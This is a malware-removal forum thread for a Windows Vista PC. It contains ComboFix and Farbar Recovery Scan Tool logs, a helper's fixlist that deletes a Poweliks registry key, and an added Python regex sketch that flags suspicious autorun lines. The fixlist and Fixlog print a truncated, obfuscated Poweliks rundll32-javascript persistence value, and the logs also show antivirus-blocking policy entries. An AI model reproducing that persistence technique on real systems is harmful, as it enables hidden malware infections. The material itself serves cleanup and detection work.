(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]
"Akamai NetSession Interface"="c:\users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe" [2014-04-18 4672920]
"iCloudServices"="c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe" [2013-10-31 59720]
"com.apple.dav.bookmarks.daemon"="c:\program files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe" [2013-10-02 59720]
"ApplePhotoStreams"="c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe" [2013-10-31 59720]
"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-08-18 37152]
"UINoteworthy"="c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll" [2014-08-20 325632]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ECenter"="c:\dell\E-Center\EULALauncher.exe" [2008-02-29 17920]
"RtHDVCpl"="RtHDVCpl.exe" [2008-03-06 4706304]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]
"dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2008-03-11 16384]
"PCMService"="c:\program files\Dell\MediaDirect\PCMService.exe" [2008-01-14 132392]
"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2012-02-23 59240]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"PMBVolumeWatcher"="c:\program files\Sony\PMB\PMBVolumeWatcher.exe" [2010-03-24 599328]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]
"AVG_TRAY"="c:\program files\AVG\AVG10\avgtray.exe" [2011-09-10 2338656]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"acevents"="c:\program files\ActivIdentity\ActivClient\acevents.exe" [2009-06-03 153640]
"accrdsub"="c:\program files\ActivIdentity\ActivClient\accrdsub.exe" [2009-06-03 400936]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]
"DameWare MRC Agent"="c:\windows\dwrcs\DWRCST.exe" [2012-11-02 379752]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"HideFastUserSwitching"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"UseDefaultTile"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk * \0BootDefrag.exe\0sasnative32
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]
@=""
.
S2 ac.sharedstore;ActivIdentity Shared Store Service;c:\program files\Common Files\ActivIdentity\ac.sharedstore.exe [2009-06-03 207400]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ   Pml Driver HPZ12 Net Driver HPZ12
HPService REG_MULTI_SZ   HPSLPSVC
hpdevmgmt REG_MULTI_SZ   hpqcxs08 hpqddsvc
LocalServiceAndNoImpersonation REG_MULTI_SZ   FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-25 c:\windows\Tasks\GlaryInitialize 5.job
- c:\program files\Glary Utilities 5\Initialize.exe [2014-08-18 01:05]
.
2014-08-25 c:\windows\Tasks\RtlNICDiagVistaStart.job
- c:\program files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-06 11:44]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uInternet Settings,ProxyOverride = *.local;<local>
TCP: DhcpNameServer = 192.168.2.1 66.18.32.2 66.18.32.3
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2014-08-25 11:08
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...  
.
scanning hidden autostart entries ... 
.
scanning hidden files ...  
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-383984)
.
Completion time: 2014-08-25  11:10:46
ComboFix-quarantined-files.txt  2014-08-25 15:10
ComboFix2.txt  2014-08-24 19:45
ComboFix3.txt  2014-08-23 20:16
ComboFix4.txt  2014-08-23 18:22
.
Pre-Run: 238,789,816,320 bytes free
Post-Run: 238,726,463,488 bytes free
.
- - End Of File - - D0071B68A17A82DBD63337816FF7894D
5C616939100B85E558DA92B899A0FC36

Still no joy.
I wonder if it's not a new modification.


Anyway we need to kill Poweliks prior to other baddies, so I'm gonna focus on it now.


Fix with Farbar Recovery Scan Tool

This fix was created for this user for use on that particular machine.
Running it on another one may cause damage and render the system unstable.


Press the Windows key + R on your keyboard at the same time. Type Notepad and click OK.

  • Copy the entire content of the codebox below and paste into the Notepad document:

    start
    HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
    CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
    end

  • Click File, Save As and type fixlist.txt as the File Name.

Both files, FRST and fixlist.txt, have to be in the same location or the fix will not work!

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    > XP users click run after receipt of Windows Security Warning - Open File.
    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please include it in your reply.



Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    > XP users click run after receipt of Windows Security Warning - Open File.
    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
  • Make sure that the Addition option is checked.
  • Press the Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.

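An added example, not part of the original posts and not FRST's own logic: the fixlist above removes a per-user CLSID localserver32 value whose data starts rundll32.exe with a javascript: argument, and the FRST logs in this thread flag several other autoruns. The Python sketch below runs a small set of regex rules over FRST-style lines to surface those patterns for review; the rule names, the triage function and the sample lines are assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample lines, modelled on the FRST log format quoted in this thread.
# SIDs, GUIDs, entry names and user paths are placeholders, not values from a real machine.
SAMPLE_LOG = r'''
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKU\S-1-5-21-1111111111-2222222222-3333333333-1000\...\Run: [ExampleEntry] => C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Example\Example.dll",DllRegisterServer <===== ATTENTION
CustomCLSID: HKU\S-1-5-21-1111111111-2222222222-3333333333-1000_Classes\CLSID\{00000000-0000-0000-0000-000000000000}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("<constructed, data elided>") <==== Poweliks?
ShortcutTarget: Example.lnk -> C:\$RECYCLE.BIN\S-1-5-21-1111111111-2222222222-3333333333-1000\ExampleAgent.exe (No File)
(Google Inc.) C:\Users\user\AppData\LocalLow\Example\Sub\browser.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
'''

# (rule name, pattern). Hypothetical rule set: every hit is a lead for a human
# reviewer, not a verdict, because legitimate software also runs from AppData.
RULES = [
    # rundll32 handed a script-protocol string instead of a DLL path
    ("rundll32-script-protocol",
     re.compile(r'rundll32(\.exe)?\s+"?javascript:', re.I)),
    # the mshtml export named in the flagged registry data
    ("mshtml-RunHTMLApplication",
     re.compile(r'mshtml\s*,\s*RunHTMLApplication', re.I)),
    # autorun that loads a DLL from a user profile through rundll32
    ("rundll32-dll-in-user-profile",
     re.compile(r'rundll32(\.exe)?"?\s+"?[a-z]:\\users\\[^"]*\\appdata\\[^"]*\.dll', re.I)),
    # software restriction policy entries, which FRST lists per blocked path
    ("software-restriction-policy",
     re.compile(r'^HKLM Group Policy restriction on software:', re.I)),
    # startup shortcut whose target sits in the recycle bin
    ("autorun-target-in-recycle-bin",
     re.compile(r'\\\$RECYCLE\.BIN\\', re.I)),
    # executable running out of the low-integrity profile folder
    ("exe-in-LocalLow",
     re.compile(r'\\AppData\\LocalLow\\.*\.exe\s*$', re.I)),
    # markers FRST itself appends to a line
    ("frst-marker",
     re.compile(r'<=+\s*(ATTENTION|Poweliks[!?]?)', re.I)),
]


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based position within the supplied text
    rules: tuple   # names of the rules that matched, in RULES order
    line: str      # the log line, stripped


def triage(log_text):
    """Return one Finding per log line that matches at least one rule."""
    findings = []
    for line_no, raw in enumerate(log_text.strip().splitlines(), start=1):
        line = raw.strip()
        hits = tuple(name for name, pattern in RULES if pattern.search(line))
        if hits:
            findings.append(Finding(line_no, hits, line))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"line {f.line_no}: {', '.join(f.rules)}")
        print(f"    {f.line[:110]}")
```

Lines that match more than one rule, such as the CustomCLSID entry, are the ones to read first; a single hit on the LocalLow or recycle-bin rule needs the surrounding log for context.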

Fixlog

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version:23-08-2014
Ran by savas.kyriakidis at 2014-08-25 13:39:24 Run:1
Running from F:\
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
start
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
end
*****************
 
"HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
 
==== End of Fixlog ====
 
FRST
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014
Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 25-08-2014 13:41:21
Running from F:\
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
( ) C:\Windows\System32\lxblcoms.exe
() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe
() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)
HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()
HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )
HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)
HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)
HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)
HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM\...\Policies\Explorer: [useDefaultTile] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTION
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnk
ShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
ShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnk
ShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
BootExecute: autocheck autochk *  BootDefrag.exesasnative32
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cab
DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)
Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]
FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
 
Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx []
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)
S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()
R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)
R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]
